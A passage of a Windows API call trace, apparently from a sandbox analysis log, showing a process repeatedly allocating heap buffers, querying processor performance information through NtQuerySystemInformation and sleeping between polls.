(HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a678 [0286.500] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a678, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a678, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0286.501] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a678 | out: hHeap=0x2560000) returned 1 [0286.501] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bb98 [0286.501] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bb98, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bb98, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0286.501] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bb98 | out: hHeap=0x2560000) returned 1 [0286.501] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cdb0 [0286.501] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cdb0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cdb0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0286.502] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cdb0 | out: hHeap=0x2560000) returned 1 [0286.502] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0286.502] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0286.502] Sleep (dwMilliseconds=0x110) [0286.547] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d5c8 [0286.548] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d5c8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d5c8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0286.549] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d5c8 | out: hHeap=0x2560000) returned 1 [0286.549] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a880 [0286.549] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a880, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a880, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0286.549] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a880 | out: hHeap=0x2560000) returned 1 [0286.550] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b510 [0286.550] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b510, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b510, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0286.550] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b510 | out: hHeap=0x2560000) returned 1 [0286.550] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c5e0 [0286.550] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c5e0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c5e0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0286.551] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c5e0 | out: hHeap=0x2560000) returned 1 [0286.551] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0286.551] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0286.551] Sleep (dwMilliseconds=0x110) [0286.579] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d750 [0286.579] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d750, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d750, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0286.580] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d750 | out: hHeap=0x2560000) returned 1 [0286.580] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a8e8 [0286.580] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a8e8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a8e8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0286.580] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a8e8 | out: hHeap=0x2560000) returned 1 [0286.580] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bd60 [0286.580] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bd60, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bd60, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0286.581] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bd60 | out: hHeap=0x2560000) returned 1 [0286.581] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cf40 [0286.581] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cf40, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cf40, ResultLength=0x19ee88*=0xc0) returned 0x0 [0286.581] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cf40 | out: hHeap=0x2560000) returned 1 [0286.582] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0286.582] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0286.582] Sleep (dwMilliseconds=0x110) [0286.601] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d5c8 [0286.601] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d5c8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d5c8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0286.602] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d5c8 | out: hHeap=0x2560000) returned 1 [0286.602] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a7b0 [0286.602] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a7b0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a7b0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0286.602] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a7b0 | out: hHeap=0x2560000) returned 1 [0286.610] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b6d8 [0286.610] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b6d8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b6d8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0286.610] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b6d8 | out: hHeap=0x2560000) returned 1 [0286.610] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cce8 [0286.610] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cce8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cce8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0286.611] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cce8 | out: hHeap=0x2560000) returned 1 [0286.611] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0286.612] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0286.612] Sleep (dwMilliseconds=0x110) [0286.622] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d638 [0286.622] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d638, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d638, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0286.623] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d638 | out: hHeap=0x2560000) returned 1 [0286.623] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285ab58 [0286.623] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285ab58, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285ab58, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0286.624] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285ab58 | out: hHeap=0x2560000) returned 1 [0286.624] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b770 [0286.624] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b770, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b770, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0286.624] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b770 | out: hHeap=0x2560000) returned 1 [0286.628] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295ca90 [0286.628] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ca90, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295ca90, ResultLength=0x19ee88*=0xc0) returned 0x0 [0286.629] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ca90 | out: hHeap=0x2560000) returned 1 [0286.629] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0286.629] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0286.629] Sleep (dwMilliseconds=0x110) [0286.641] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d600 [0286.641] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d600, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d600, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0286.641] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d600 | out: hHeap=0x2560000) returned 1 [0286.641] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285ac28 [0286.642] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285ac28, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285ac28, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0286.642] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285ac28 | out: hHeap=0x2560000) returned 1 [0286.642] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b938 [0286.642] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b938, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b938, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0286.643] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b938 | out: hHeap=0x2560000) returned 1 [0286.643] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d0d0 [0286.643] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d0d0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d0d0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0286.644] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d0d0 | out: hHeap=0x2560000) returned 1 [0286.644] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0286.644] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0286.644] Sleep (dwMilliseconds=0x110) [0286.668] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d6e0 [0286.668] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d6e0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d6e0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0286.669] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d6e0 | out: hHeap=0x2560000) returned 1 [0286.669] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aaf0 [0286.669] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aaf0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aaf0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0286.669] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aaf0 | out: hHeap=0x2560000) returned 1 [0286.669] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b5a8 [0286.669] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b5a8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b5a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0286.670] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b5a8 | out: hHeap=0x2560000) returned 1 [0286.670] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c900 [0286.670] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c900, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c900, ResultLength=0x19ee88*=0xc0) returned 0x0 [0286.671] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c900 | out: hHeap=0x2560000) returned 1 [0286.671] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0286.671] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0286.671] Sleep (dwMilliseconds=0x110) [0286.782] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d8a0 [0286.782] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d8a0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d8a0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0286.783] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d8a0 | out: hHeap=0x2560000) returned 1 [0286.783] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a818 [0286.783] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a818, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a818, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0286.783] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a818 | out: hHeap=0x2560000) returned 1 [0286.783] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b9d0 [0286.783] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b9d0, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b9d0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0286.784] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b9d0 | out: hHeap=0x2560000) returned 1 [0286.784] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d008 [0286.784] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d008, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d008, ResultLength=0x19ee88*=0xc0) returned 0x0 [0286.784] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d008 | out: hHeap=0x2560000) returned 1 [0286.784] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0286.785] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0286.785] Sleep (dwMilliseconds=0x110) [0286.795] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d718 [0286.795] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d718, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d718, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0286.796] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d718 | out: hHeap=0x2560000) returned 1 [0286.796] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a880 [0286.796] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a880, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a880, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0286.797] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a880 | out: hHeap=0x2560000) returned 1 [0286.797] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bdf8 [0286.797] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bdf8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bdf8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0286.797] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bdf8 | out: hHeap=0x2560000) returned 1 [0286.797] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cb58 [0286.797] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cb58, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cb58, ResultLength=0x19ee88*=0xc0) returned 0x0 [0286.803] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cb58 | out: hHeap=0x2560000) returned 1 [0286.803] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0286.804] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0286.804] Sleep (dwMilliseconds=0x110) [0286.822] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d6e0 [0286.822] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d6e0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d6e0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0286.823] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d6e0 | out: hHeap=0x2560000) returned 1 [0286.823] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285abc0 [0286.823] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285abc0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285abc0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0286.823] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285abc0 | out: hHeap=0x2560000) returned 1 [0286.823] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bb98 [0286.823] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bb98, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bb98, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0286.824] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bb98 | out: hHeap=0x2560000) returned 1 [0286.824] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295ce78 [0286.824] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ce78, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295ce78, ResultLength=0x19ee88*=0xc0) returned 0x0 [0286.825] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ce78 | out: hHeap=0x2560000) returned 1 [0286.831] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0286.832] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0286.832] Sleep (dwMilliseconds=0x110) [0286.895] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d718 [0286.895] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d718, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d718, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0286.895] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d718 | out: hHeap=0x2560000) returned 1 [0286.895] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a540 [0286.895] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a540, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a540, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0286.896] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a540 | out: hHeap=0x2560000) returned 1 [0286.904] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b5a8 [0286.904] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b5a8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b5a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0286.905] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b5a8 | out: hHeap=0x2560000) returned 1 [0286.905] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c900 [0286.905] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c900, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c900, ResultLength=0x19ee88*=0xc0) returned 0x0 [0286.905] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c900 | out: hHeap=0x2560000) returned 1 [0286.905] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0286.906] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0286.906] Sleep (dwMilliseconds=0x110) [0286.986] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d6a8 [0286.986] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d6a8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d6a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0286.986] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d6a8 | out: hHeap=0x2560000) returned 1 [0286.995] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aa20 [0286.995] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aa20, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aa20, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0286.996] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aa20 | out: hHeap=0x2560000) returned 1 [0286.996] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bfc0 [0286.996] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bfc0, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bfc0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0286.997] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bfc0 | out: hHeap=0x2560000) returned 1 [0287.016] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d008 [0287.016] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d008, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d008, ResultLength=0x19ee88*=0xc0) returned 0x0 [0287.016] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d008 | out: hHeap=0x2560000) returned 1 [0287.016] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0287.017] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0287.017] Sleep (dwMilliseconds=0x110) [0287.177] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d830 [0287.177] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d830, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d830, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0287.177] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d830 | out: hHeap=0x2560000) returned 1 [0287.177] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a4d8 [0287.178] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a4d8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a4d8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0287.178] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a4d8 | out: hHeap=0x2560000) returned 1 [0287.183] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bb98 [0287.183] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bb98, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bb98, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0287.184] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bb98 | out: hHeap=0x2560000) returned 1 [0287.188] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c5e0 [0287.188] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c5e0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c5e0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0287.189] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c5e0 | out: hHeap=0x2560000) returned 1 [0287.196] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0287.196] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0287.196] Sleep (dwMilliseconds=0x110) [0287.301] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d590 [0287.301] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d590, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d590, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0287.302] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d590 | out: hHeap=0x2560000) returned 1 [0287.302] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aa20 [0287.302] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aa20, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aa20, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0287.302] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aa20 | out: hHeap=0x2560000) returned 1 [0287.302] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c188 [0287.302] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c188, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c188, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0287.303] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c188 | out: hHeap=0x2560000) returned 1 [0287.303] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d008 [0287.303] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d008, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d008, ResultLength=0x19ee88*=0xc0) returned 0x0 [0287.304] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d008 | out: hHeap=0x2560000) returned 1 [0287.304] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0287.304] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0287.304] Sleep (dwMilliseconds=0x110) [0287.402] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d520 [0287.402] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d520, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d520, 